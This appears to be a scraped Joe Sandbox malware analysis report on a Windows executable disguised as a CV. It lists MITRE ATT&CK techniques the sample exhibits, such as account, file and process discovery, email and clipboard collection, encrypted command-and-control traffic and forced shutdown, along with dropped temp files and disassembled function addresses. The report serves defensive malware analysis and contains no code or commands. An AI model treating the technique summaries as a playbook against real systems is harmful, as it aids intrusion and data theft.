Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CV_ Filipa Barbosa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7390-mXL

C:\Users\user\AppData\Local\Temp\autDF5B.tmp

C:\Users\user\AppData\Local\Temp\chiffons

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
CV_ Filipa Barbosa.exe

Function 0031B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 002F3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0030DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 002F406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0033FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 002F3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0033BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 002F3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 002F3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 01375D20 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002F49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 002F36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01375AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
fileCOMMON

Function 002F4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre